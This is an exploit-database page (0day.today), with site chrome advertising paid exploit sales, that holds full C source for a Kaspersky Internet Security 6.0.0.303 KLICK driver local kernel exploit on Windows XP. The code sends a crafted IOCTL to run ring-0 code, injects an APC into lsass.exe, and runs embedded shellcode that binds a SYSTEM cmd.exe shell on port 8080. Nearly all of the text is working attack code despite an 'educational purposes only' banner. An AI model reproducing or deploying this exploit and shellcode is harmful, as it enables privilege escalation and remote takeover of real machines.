0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Kaspersky Internet Security 6.0.0.303 IOCTL KLICK Local Exploit
=============================================================== Kaspersky Internet Security 6.0.0.303 IOCTL KLICK Local Exploit =============================================================== //////////////////////////////////// ///// AVP (Kaspersky) //////////////////////////////////// //// FOR EDUCATIONAL PURPOSES ONLY //// Kernel Privilege Escalation #2 //// Exploit //// Rub?n Santamarta //// www.reversemode.com //// 01/09/2006 //// //// ////Modify by Nanika ////naninb[at]gmail.com ////nanika[at]chroot.org ////Exploit Get SYSTEM SHELL PORT 8080 ////WindowsXP Version SP2+ Kaspersky Internet Security 6.0.0.303 ////Do not Enable Hardware DEP ////Reference: ////http://hitcon.org/download/2005/Windows_Kernel_Shellcode_Exploit.pdf ////http://research.eeye.com/html/Papers/download/StepIntoTheRing.pdf ////http://www.security.org.sg/code/sdtrestore.html ////http://www.reversemode.com/ //// //// //// ////I AM NOT Japanese :P ////?????@?O?sKernel Exploit???H???@????U ////???O???q?? //////////////////////////////////// #define sysenter __asm __emit 0x0f __asm __emit 0x34 #include <windows.h> #include <stdio.h> #define STATUS_SUCCESS ((NTSTATUS)0x00000000L) #define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L) #define OBJ_CASE_INSENSITIVE 0x00000040L #define PAGE_READONLY 0x02 #define PAGE_READWRITE 0x04 #define DEF_KERNEL_BASE 0x80400000L #define SystemModuleInformation 11 #define PROT_MEMBASE 0x80000000 typedef LONG NTSTATUS; typedef struct _SYSTEM_MODULE_INFORMATION { ULONG Reserved[2]; PVOID Base; ULONG Size; ULONG Flags; USHORT Index; USHORT Unknown; USHORT LoadCount; USHORT ModuleNameOffset; CHAR ImageName[256]; } SYSTEM_MODULE_INFORMATION; NTSTATUS (WINAPI * _NtQuerySystemInformation)(UINT, PVOID, ULONG, PULONG); HINSTANCE base; DWORD *kbase; int *ExAllocatePool; int *KeInitializeApc; int *KeInsertQueueApc; int *ZwYieldExecution; unsigned char code[] = //USER MODE Shellcode bind port 8080 //470bytes "\x90\x90\x90\x90\x90" "\x83\xec\x34\x8b\xf4\xe8\x47\x01\x00\x00\x89\x06\xff\x36\x68\x8e" "\x4e\x0e\xec\xe8\x61\x01\x00\x00\x89\x46\x08\xff\x36\x68\xad\xd9" "\x05\xce\xe8\x52\x01\x00\x00\x89\x46\x0c\x68\x6c\x6c\x00\x00\x68" "\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\xff\x56\x08\x89\x46\x04" "\xff\x36\x68\x72\xfe\xb3\x16\xe8\x2d\x01\x00\x00\x89\x46\x10\xff" "\x36\x68\x7e\xd8\xe2\x73\xe8\x1e\x01\x00\x00\x89\x46\x14\xff\x76" "\x04\x68\xcb\xed\xfc\x3b\xe8\x0e\x01\x00\x00\x89\x46\x18\xff\x76" "\x04\x68\xd9\x09\xf5\xad\xe8\xfe\x00\x00\x00\x89\x46\x1c\xff\x76" "\x04\x68\xa4\x1a\x70\xc7\xe8\xee\x00\x00\x00\x89\x46\x20\xff\x76" "\x04\x68\xa4\xad\x2e\xe9\xe8\xde\x00\x00\x00\x89\x46\x24\xff\x76" "\x04\x68\xe5\x49\x86\x49\xe8\xce\x00\x00\x00\x89\x46\x28\xff\x76" "\x04\x68\xe7\x79\xc6\x79\xe8\xbe\x00\x00\x00\x89\x46\x2c\x33\xff" "\x81\xec\x90\x01\x00\x00\x54\x68\x01\x01\x00\x00\xff\x56\x18\x50" "\x50\x50\x50\x40\x50\x40\x50\xff\x56\x1c\x8b\xd8\x57\x57\x68\x02" "\x00\x1f\x90\x8b\xcc\x6a\x16\x51\x53\xff\x56\x20\x57\x53\xff\x56" "\x24\x57\x51\x53\xff\x56\x28\x8b\xd0\x68\x65\x78\x65\x00\x68\x63" "\x6d\x64\x2e\x89\x66\x30\x83\xec\x54\x8d\x3c\x24\x33\xc0\x33\xc9" "\x83\xc1\x15\xab\xe2\xfd\xc6\x44\x24\x10\x44\xfe\x44\x24\x3d\x89" "\x54\x24\x48\x89\x54\x24\x4c\x89\x54\x24\x50\x8d\x44\x24\x10\x54" "\x50\x51\x51\x51\x6a\x01\x51\x51\xff\x76\x30\x51\xff\x56\x10\x8b" "\xcc\x6a\xff\xff\x31\xff\x56\x0c\x8b\xc8\x57\xff\x56\x2c\xff\x56" "\x14\x55\x56\x64\xa1\x30\x00\x00\x00\x85\xc0\x78\x0c\x8b\x40\x0c" "\x8b\x70\x1c\xad\x8b\x68\x08\xeb\x09\x8b\x40\x34\x8b\xa8\xb8\x00" "\x00\x00\x8b\xc5\x5e\x5d\xc2\x04\x00\x53\x55\x56\x57\x8b\x6c\x24" "\x18\x8b\x45\x3c\x8b\x54\x05\x78\x03\xd5\x8b\x4a\x18\x8b\x5a\x20" "\x03\xdd\xe3\x32\x49\x8b\x34\x8b\x03\xf5\x33\xff\xfc\x33\xc0\xac" "\x3a\xc4\x74\x07\xc1\xcf\x0d\x03\xf8\xeb\xf2\x3b\x7c\x24\x14\x75" "\xe1\x8b\x5a\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b" "\x04\x8b\x03\xc5\xeb\x02\x33\xc0\x8b\xd5\x5f\x5e\x5d\x5b\xc2\x04" "\x00"; void Ring0Function() { /* printf("----[RING0]----\n"); printf("Hello From Ring0!\n"); printf("----[RING0]----\n\n"); WinExec("cmd.exe",SW_SHOW); */ __asm { nop nop nop nop nop nop nop nop /*start here*/ mov eax,fs:[0x124]//TEB mov esi,[eax+0x44]//EPROCESS mov eax,esi search: mov eax,[eax+0x88] //activeprocess sub eax,0x88 // cmp dword ptr[eax+0x84],0x444//EPROCESS_PID cmp dword ptr[eax+0x174],'sasl'//FileName lsass.exe jne search // mov ebx,dword ptr[eax+0xc8]//system token mov ebx,eax lea esi,code//code mov ecx,0x1d6// code = 0x1d6 mov dword ptr[edi],0xffdf0800//Kernel ffdf0000=user 7ffe0000 push edi mov edi,[edi] rep movsb pop edi mov ecx,dword ptr[ebx+0x190] finddelay: mov ecx,[ecx] cmp byte ptr[ecx-0x1ff],0x5//1ff =ethread list - state 0x5=wait jnz finddelay sub ecx,0x22c mov ebp,ecx push 0x30//APC Object sizeof push 0 //Nonpage mov eax,ExAllocatePool//ExAllocatePool for APC Object call eax//call ExAllocatePool mov esi,eax xor edx,edx push edx//NULL push 01//UserMode // push dword ptr[edi]//user mode shellcode mov eax,0x7ffe0800//user mode shellcode push eax//User Mode routine push edx//NULL mov eax,ZwYieldExecution//0x804dd668//804dd237=kernel routine ret push eax//Kernel Mode routine push edx//NULL push ebp//ETHREAD push esi//APC object mov eax,KeInitializeApc //initialize APC call eax xor ecx,ecx xor edx,edx xor eax,eax push eax push eax push ebp//ETHREAD push esi//APC Object mov eax,KeInsertQueueApc call eax // test eax,eax // jz recall mov byte ptr[ebp+0x4a],0x1 /* push 0x80000000 push 0 push 0 mov eax,0x804dd4b8 call eax */ /* yeldloop: mov eax,0x804df4d5 call eax jmp yeldloop */ iretd /*end here*/ int 3 NOP NOP NOP NOP NOP NOP NOP NOP } exit(1); //printf("WindowsXP Version :P\n\n"); } BOOL getNativeAPIs(void) { HMODULE hntdll; hntdll = GetModuleHandle("ntdll.dll"); *(FARPROC *)&_NtQuerySystemInformation = GetProcAddress(hntdll, "ZwQuerySystemInformation"); if(_NtQuerySystemInformation) { return TRUE; } return FALSE; } DWORD getKernelBase(void) { HANDLE hHeap = GetProcessHeap(); NTSTATUS Status; ULONG cbBuffer = 0x8000; PVOID pBuffer = NULL; DWORD retVal = DEF_KERNEL_BASE; do { pBuffer = HeapAlloc(hHeap, 0, cbBuffer); if (pBuffer == NULL) return DEF_KERNEL_BASE; Status = _NtQuerySystemInformation(SystemModuleInformation, pBuffer, cbBuffer, NULL); if(Status == STATUS_INFO_LENGTH_MISMATCH) { HeapFree(hHeap, 0, pBuffer); cbBuffer *= 2; } else if(Status != STATUS_SUCCESS) { HeapFree(hHeap, 0, pBuffer); return DEF_KERNEL_BASE; } } while (Status == STATUS_INFO_LENGTH_MISMATCH); DWORD numEntries = *((DWORD *)pBuffer); SYSTEM_MODULE_INFORMATION *smi = (SYSTEM_MODULE_INFORMATION *)((char *)pBuffer + sizeof(DWORD)); for(DWORD i = 0; i < numEntries; i++) { if(strcmpi(smi->ImageName, "ntoskrnl.exe")) { printf("%.8X - %s\n", smi->Base, smi->ImageName); retVal = (DWORD)(smi->Base); break; } smi++; } HeapFree(hHeap, 0, pBuffer); return retVal; } VOID ShowError() { LPVOID lpMsgBuf; FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER| FORMAT_MESSAGE_FROM_SYSTEM, NULL, GetLastError(), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), (LPTSTR) &lpMsgBuf, 0, NULL); MessageBoxA(0,(LPTSTR)lpMsgBuf,"Error",0); exit(1); } int main(int argc, char *argv[]) { DWORD InBuff[1]; DWORD dwIOCTL,OutSize,InSize,junk; HANDLE hDevice; OSVERSIONINFO ov; system("cls"); printf("#######################\n"); printf("## AVP Ring0 Exploit ##\n"); printf("#######################\n"); printf("Ruben Santamarta\nwww.reversemode.com\n\n"); printf("Modify by Nanika\n\n"); printf("naninb[at]gmail.com\n"); printf("www.chroot.org\n"); printf("WindowsXP Version SP2+ Kaspersky Internet Security 6.0.0.303 :P\n"); ov.dwOSVersionInfoSize = sizeof(ov); GetVersionEx(&ov); if(ov.dwMajorVersion != 5) { printf("Sorry, this version supports only WinXP.\n"); return 1; } if(ov.dwMinorVersion != 1) { printf("Sorry, this version supports only WinXP.\n"); return 1; } getNativeAPIs(); kbase=(unsigned long *)getKernelBase(); base=LoadLibrary("ntoskrnl.exe"); ExAllocatePool=(int *)GetProcAddress(base,"ExAllocatePool"); KeInitializeApc=(int *)GetProcAddress(base,"KeInitializeApc"); KeInsertQueueApc=(int *)GetProcAddress(base,"KeInsertQueueApc"); ZwYieldExecution=(int *)GetProcAddress(base,"ZwYieldExecution"); ExAllocatePool=(int *)((int *)ExAllocatePool - (int *)base+(int *)kbase); KeInitializeApc=(int *)((int *)KeInitializeApc-(int *)base+(int *)kbase); KeInsertQueueApc=(int *)((int *)KeInsertQueueApc-(int *)base+(int *)kbase); ZwYieldExecution=(int *)((int *)ZwYieldExecution-(int *)base+(int *)kbase); FreeLibrary(base); hDevice = CreateFile("\\\\.\\KLICK", 0, 0, NULL, 3, 0, 0); ////////////////////// ///// INFO ////////////////////// if (hDevice == INVALID_HANDLE_VALUE) ShowError(); printf("[!] KLICK Device Handle [%x]\n",hDevice); ////////////////////// ///// BUFFERS ////////////////////// InSize = 0x8; InBuff[0] =(DWORD) Ring0Function; // Ring0 ShellCode Address ////////////////////// ///// IOCTL ////////////////////// dwIOCTL = 0x80052110; printf("[!] IOCTL [0x%x]\n\n",dwIOCTL); printf("Exploit TEST!!!!!!!!!!\n\n"); printf("Telnet x.x.x.x 8080 get SYSTEM shell!!!!!!!! :P\n\n"); DeviceIoControl(hDevice, dwIOCTL, InBuff,0x8, (LPVOID)NULL,0, &junk, NULL); } # 0day.today [2024-12-24] #